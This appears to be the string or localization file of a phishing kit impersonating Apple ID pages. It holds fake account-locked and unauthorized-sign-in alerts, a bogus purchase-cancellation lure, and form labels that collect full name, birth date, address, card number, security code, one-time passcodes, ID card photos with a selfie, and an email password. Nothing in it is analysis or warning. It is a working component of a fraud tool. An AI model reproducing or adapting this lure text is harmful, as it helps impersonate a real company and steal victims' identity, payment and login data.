3ccaa0cb34795704f4148627e9c8c0f4 = "Manage your Apple ID"
e222b39eb20bf93dcedbc13b41a82882 = "Manage your Apple account"
6675609ae0e858c1153a4ba7aa67d441 = "Remember me"
87a7c6aa09d3eaa3ba47147a78b6763c = "Forgot Apple ID or password?"
de9b32a634f6564c0b35081c78da8d30 = "Confirm your information"
cb7a8df9d91f5236cd8c304023e74fa1 = "Account Verification"
b52853378b0e13390e1e610d053eba75 = "Your Apple ID is"
57ca45e580571a42e3bdac875bac5e21 = "Sign Out"
e76a13494724c47d9f61d8f893c74ef2 = "Personal Information"
60dbaf855913b8f48516abb6b7cca249 = "Personal"
be94e7e9b1e35cffbe42e090363a7b71 = "Information"
0003b80ddb66fcef4d38a457474aeacb = "NAME"
cb31393a04012ae42947f1c81390403b = "first name"
8d031e086fb7ea3748ecb163f0d19b37 = "last name"
4ab4a6abc0d139b55f71cdc5a5caa6c5 = "DATE OF BIRTH"
412dd68a92b9f764ec0eb4037ec25d0b = "PHONE"
b83deebfa5020f39036f6f8ab44c2124 = "phone number"
ff47353e0f01fc3f25d42a4d2e32bbc5 = "ADDRESS"
aa62ce6a64363747c782eeaab44ba599 = "street address"
9594b12323450bb227335a3134d551d6 = "city"
2945f2f9ab007fbcc60135e714111b8e = "state"
d76823a94fff88840c4fcd382c41de4b = "zip code"
03b959cb60fc27590605e806a7ab89ee = "Account Details"
7e5ffb656b38f00d726bf8ca9d4be3db = "CARD DETAILS"
70d9eb5a23551ff5bb1443a862b05264 = "cardholders name"
831ad40d84089c875fe665cd830bba51 = "card number"
ce87fd3469fdfb6cdab3270f415bbee2 = "security code"
a861749be2bcdfb3f94f16a5e5ce4e2d = "Continue"
3736617c2fe3437cfa746964a9753fec = "en"
f3701802ed5e054d21fff70e6a36ceb2 = "Please enter information pertaining to your credit card to confirm your AppleID."
c068b5d25757a19c3e6368068cbb1650 = "Processing ..."
554c55bbf69918e87411da4931c07bbf = "Card Number"
b881471ec4a72e1f9d8956f972122037 = "One time pass : "
d33d7dd43fb8fa05cb670e787a52f7d3 = "Upload Identity"
a8747c627b3c049865e0178b4492c62d = "TAKE A SELFIE WITH"
329bb0ce0aa03ae0fc45b160a5e61c8b = "FRONT CARD"
29212d9864bc8eb8d13b9111e28ce660 = "BACK CARD"
6c1ac00170eced7e5cdd62f8aa302952 = "TAKE A SELFIE BY HOLDING CARD"
8ffb60589e986e065cb47311818bb5b3 = "Cardholders name and ID card should match and be clearly visible."
c9863bba5f5e450ffc01d1e355a8be8d = "Please upload front and back your card."
09bba74e1b5d27bbd17fdc4bccd800e6 = "Link an Email"
5cb06e9c99349878d458667d184f63f4 = "E-mail"
d26120585bb1da63c254a3441ac1378a = "Password"
9efa70c0eb5aa21149bdd7b15ae64871 = "Go Back"
04dd28320f8634370339884f5a97ebe2 = "Account Verification Complete"
c3233fe1ebbe0dcca61f929f147ea788 = "Please wait while we restore your account access..."
5a5563c4a1e3c0668ee50a55abb64ca2 = "This Apple ID has been locked for security reasons."
09c7a395594d63a92e4d081e743b1249 = "You must unlock your account before signing in."
8cc1601f1ff5db1a3f4c97fd24fa2434 = "Unlock Account"
19acd9ba26868dc85e6e75f6e2bace87 = "Cancel"
23c570be46d88a1b2078190c1f8a3b48 = "Are you sure to cancel this purchase?"
ebaed3fd877f2bf77e7d1c5be2e1b873 = "To cancel this transaction, you must verify your account."
f9d28b630512b6f53973e0c0ad2549b3 = "Cancel Now"
ff3426261ae0b9c59f1baa8b92db40f3 = "We has detected an unauthorized sign in to your Apple ID."
0f9e3d0f8d0eb22dd9525ad861a17389 = "To secure your Apple ID, you must verify your account."
7a35debec58581d67d7e574e77800d37 = "Verify Account"
db65552f56e8e8c0f35f5f581737c322 = "Your credit card was declined. Please enter another credit card. "
b6124182b72125d2435be13c4aef79b3 = "Try Another Card "
121d95685dcb330537d6fdac8d257e24 = "Payment Error"